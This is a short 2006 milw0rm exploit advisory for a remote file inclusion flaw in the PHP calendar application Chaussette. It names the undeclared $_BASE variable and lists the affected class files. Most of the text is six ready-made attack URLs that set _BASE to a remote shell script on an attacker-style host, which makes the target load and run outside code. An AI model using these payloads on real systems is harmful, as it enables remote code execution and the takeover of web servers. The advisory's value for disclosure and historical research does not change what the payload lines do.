32 lines
No EOL
1 KiB
Text
32 lines
No EOL
1 KiB
Text
Chaussette Remote File Inclusion
|
|
|
|
CreW: ToXiC
|
|
Bug Found By Drago84
|
|
|
|
Source Code:
|
|
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip
|
|
|
|
Page Affect
|
|
/Classes/Evenement.php
|
|
/Classes/Event.php
|
|
/Classes/Event_for_month.php
|
|
/Classes/Event_for_month_per_day.php
|
|
/Classes/Event_for_week.php
|
|
/Classes/My_Log.php
|
|
/Classes/My_Smarty.php
|
|
|
|
Problem Is :
|
|
$_BASE Not Declare;
|
|
|
|
|
|
ExP:
|
|
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
|
|
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
|
|
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
|
|
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
|
|
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
|
|
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php
|
|
|
|
Greatz: Str0ke
|
|
|
|
# milw0rm.com [2006-08-10] |